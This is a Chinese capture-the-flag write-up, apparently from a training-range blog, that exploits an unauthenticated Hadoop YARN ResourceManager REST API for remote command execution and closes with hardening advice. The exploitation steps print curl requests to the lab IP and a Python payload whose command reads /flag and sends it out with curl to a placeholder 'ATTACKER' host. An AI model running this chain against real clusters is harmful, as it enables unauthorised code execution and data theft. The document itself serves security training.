玄机网络安全靶场:Hadoop YARN ResourceManager 未授权 RCE WP

解题报告:Hadoop YARN ResourceManager 未授权 RCE

题目名称 :Hadoop YARN ResourceManager(Unauthorized)
难度 :简单
分类 :渗透
Flagflag{41d1290e-e2d2-4028-85ce-43909a1787c4}


漏洞背景

Hadoop YARN(Yet Another Resource Negotiator)是 Apache Hadoop 的集群资源管理系统。YARN ResourceManager 提供了一套 REST API 用于集群管理,默认情况下该 API 无需任何认证即可访问。攻击者可以通过以下步骤在集群节点上执行任意命令:

  1. 调用 POST /ws/v1/cluster/apps/new-application 创建新的 Application ID
  2. 调用 POST /ws/v1/cluster/apps 提交包含恶意命令的 Application
  3. YARN 的 NodeManager 会在容器中执行该命令

靶机信息

项目
靶机 IP 43.192.45.210
服务端口 8088(YARN ResourceManager Web UI)
服务版本 Hadoop YARN(Jetty 6.1.26)
目标文件 /flag

利用过程

第一步:确认服务连通性

bash 复制代码
curl -v http://43.192.45.210:8088/
# 返回 HTTP 302 → /cluster,确认 YARN 服务正常运行

第二步:获取新 Application ID

bash 复制代码
curl -s -X POST "http://43.192.45.210:8088/ws/v1/cluster/apps/new-application" \
    -H "Content-Type: application/json"
# 返回:{"application-id":"application_1776602744486_0011",...}

第三步:提交恶意 Application

通过 Python 构造 JSON payload,命令使用 /bin/sh -c 执行,将 /flag 内容通过 curl 外带到攻击者服务器:

python 复制代码
command = '/bin/sh -c \'curl -sk "https://ATTACKER/?r=$(cat /flag 2>&1 | tr -d \'\\n\')"\''

payload = {
    "application-id": app_id,
    "application-name": "exploit",
    "am-container-spec": {
        "commands": {"command": command}
    },
    "application-type": "YARN",
    "unmanaged-AM": False,
    "max-app-attempts": 1,
    "resource": {"memory": 1024, "vCores": 1},
    ...
}

第四步:接收外带数据

在攻击者服务器上启动 HTTP 服务,收到请求:

复制代码
GET /flag1?r=flag41d1290e-e2d2-4028-85ce-43909a1787c4 HTTP/1.1

Flag: flag{41d1290e-e2d2-4028-85ce-43909a1787c4}


关键技术点

技术点 说明
无认证 REST API YARN ResourceManager 默认不需要认证
Application 提交 通过 REST API 提交包含任意命令的 Application
命令执行环境 NodeManager 容器中以 hadoop 用户执行
外带方式 靶机可以访问外网,用 curl 将结果发送到攻击者服务器
base64 问题 靶机环境 base64 -w 0 不支持,改用 tr -d '\n' 去除换行

修复建议

  1. 为 YARN ResourceManager REST API 启用 Kerberos 认证
  2. 配置防火墙,限制 8088 端口只允许内网访问
  3. 启用 YARN 的 ACL(Access Control List)功能
  4. 升级到支持认证的 Hadoop 版本并正确配置安全模式

相关推荐
淼淼爱喝水1 分钟前
【Ansible 入门实战】三种变量详解
java·linux·数据库·ansible·playbook
docsz4 分钟前
Ambari3.0集成Flink 2.2+Paimon1.4
大数据·flink
云草桑6 分钟前
Odoo企业商用到底是不是免费的?
数据库·odoo·erp
CryptoPP12 分钟前
快速集成:基于现代API的金融数据流解决方案
大数据·数据结构·笔记·金融·区块链
燕-孑16 分钟前
redis详解-进阶
数据库·redis·缓存
清平乐的技术专栏17 分钟前
【Flink学习】(七)Flink 状态编程入门,有状态实时计算
大数据·学习·flink
BGD1045017319 分钟前
datagear(7)-期末作业:综合数据分析
数据库·数据分析
穗余20 分钟前
2026 AI x Web3 School共学营笔记-Day3
人工智能·笔记·web3
humors22121 分钟前
不借外力,内力自生:提升竞赛水平的四种内功心法
大数据·程序人生
Hoxy.R22 分钟前
百家争鸣下的 Vastbase G100:一次国产数据库体验与思考
数据库